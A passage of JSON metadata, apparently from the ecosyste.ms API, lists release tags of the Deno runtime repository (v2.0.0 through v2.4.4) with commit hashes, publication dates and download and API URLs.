repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G